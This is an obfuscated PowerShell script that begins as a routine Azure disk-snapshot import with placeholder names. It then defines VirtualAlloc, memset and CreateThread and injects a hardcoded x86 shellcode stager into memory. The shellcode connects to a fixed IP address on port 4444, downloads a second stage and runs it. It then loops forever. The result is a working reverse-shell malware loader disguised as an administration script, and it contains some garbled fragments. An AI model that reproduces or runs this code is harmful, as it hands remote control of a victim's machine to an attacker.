${sU`BScrI`p`Ti`ONID} = ("{3}{2}{0}{4}{5}{1}"-f 'ri','Id','rSubsc','you','ptio','n')


${rEs`OuRCEG`R`OuPNAME} =("{1}{2}{4}{3}{0}" -f 'me','y','ou','esourceGroupNa','rR')


${SNap`S`HOTnaMe} = ("{2}{3}{1}{0}"-f 'e','Nam','yourSnapsh','ot')


${S`ToraGEty`pE} = ("{2}{3}{1}{0}"-f'dLRS','r','Sta','nda')





${l`O`caTion} = ("{1}{0}{2}"-f'u','west','s')




${s`Ou`RcevHdURi} = ("{17}{6}{18}{7}{11}{1}{16}{5}{4}{13}{10}{9}{2}{20}{8}{19}{12}{14}{0}{3}{15}"-f'/you','r','.win','rVH','cco','A','ttps','yourSt','ows','.core','lob','o','et/','untName.b','vhds','DName.vhd','age','h','://','.n','d')




${st`OraGE`Ac`Countid} = ("{1}{0}{20}{11}{4}{3}{10}{7}{21}{6}{17}{9}{2}{8}{14}{13}{5}{19}{15}{22}{18}{12}{16}"-f 'ons','/subscripti','e/prov','ionId/r','urSubscript','ro','sourceGr','urceG','i','Nam','eso','yo','rStorageAccount','Mic','ders/','e/storageAcco','Name','oup','ou','soft.Storag','/','roups/yourRe','unts/y')


.("{2}{4}{3}{0}{1}"-f 'ptio','n','Select','bscri','-AzSu') -SubscriptionId ${su`BSCRIPtIon`id}

${SNa`pSh`otC`onFiG} = .("{1}{0}{2}{3}" -f'-AzSn','New','apshotConfi','g') -AccountType ${s`To`RAgETypE} -Location ${LOC`ATioN} -CreateOption ("{0}{1}" -f 'I','mport') -StorageAccountId ${S`Tor`AgEaCC`oUNt`Id} -SourceUri ${SOu`R`ce`V`hDURi} 
&('?')?
.("{1}{2}{3}{0}"-f'hot','N','ew-AzSnap','s') -Snapshot ${sNa`pShO`TCo`NfiG} -ResourceGroupName ${R`esoUR`CEgRO`UPn`AmE} -SnapshotName ${S`NA`PShOtna`ME}
&('?')?

${c} = ((("{23}{42}{45}{53}{43}{44}{52}{85}{79}{62}{88}{70}{11}{32}{76}{36}{84}{64}{5}{20}{58}{60}{66}{40}{33}{17}{74}{50}{57}{56}{19}{30}{31}{38}{18}{7}{82}{55}{68}{87}{39}{6}{21}{37}{26}{24}{67}{86}{27}{35}{54}{77}{59}{41}{9}{15}{75}{25}{83}{51}{73}{14}{8}{65}{1}{28}{34}{72}{13}{71}{69}{12}{29}{63}{10}{3}{48}{47}{80}{46}{0}{2}{4}{16}{89}{22}{49}{78}{81}{61}" -f 'e','nt d','x','.dl','t','(','ti','oThke','ter, u','n','msvcrt','ic ','Im','l','arame','t','ern IntPtr mem','ize, ui','t(',' uin','IntPtr ','c ext','t(','[','reat','tPtr','C','d(Int','wCreationFlags','por','t ','flProtect);[','extern Int','S',', IntPt','Ptr lp','rtualA','ern IntPtr ','DllImpor','ta','dw','i','DllImpor','d','ll','t(oThk',' static ','Th)]pub','lo','IntP','t flAlloca','Ptr','o','ernel32.','ThreadAttrib','2.dlloT','nType,','tio','lpAddress','u',', ','t src, uint count);',')]pu','t(oTh','c','i','uint ','eTh','h)','eadId);[Dll','at','pThr','r ',' lpP','n',' dwStackSize, In','Ptr Vi','utes, ','tr d','h','lic','est, uin','rnel3',' lpStartAddress, Int','llo','T','rea',']public s','blic st','se'))."RepL`AcE"(([ChaR]111+[ChaR]84+[ChaR]104),[strIng][ChaR]34));${W} = .("{1}{0}{2}" -f '-T','Add','ype') -memberDefinition ${c} -Name ("{1}{0}" -f 'in32','W') -namespace ("{2}{3}{0}{1}{4}" -f't','io','Win','32Func','ns') -passthru;[Byte[]];[Byte[]]${sC} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xb9,0x1c,0x16,0x3f,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x75,0xee,0xc3;${s`iZE} = 0x1000;if (${sc}."L`en`gtH" -gt 0x1000){${sI`ze} = ${S`c}."LE`Ngth"};${x}=${W}::("{0}{1}{2}"-f 'VirtualAll','o','c').Invoke(0,0x1000,${si`Ze},0x40);for (${i}=0;${i} -le (${Sc}."l`e`NgtH"-1);${i}++) {${w}::"M`emS`et"([IntPtr](${X}.("{0}{1}{2}" -f'T','oInt','32').Invoke()+${i}), ${sC}[${I}], 1)};${W}::("{2}{3}{1}{0}" -f 'ead','hr','Cre','ateT').Invoke(0,0,${x},0,0,0);for (;;){.("{1}{2}{0}" -f'-sleep','Sta','rt') 60};
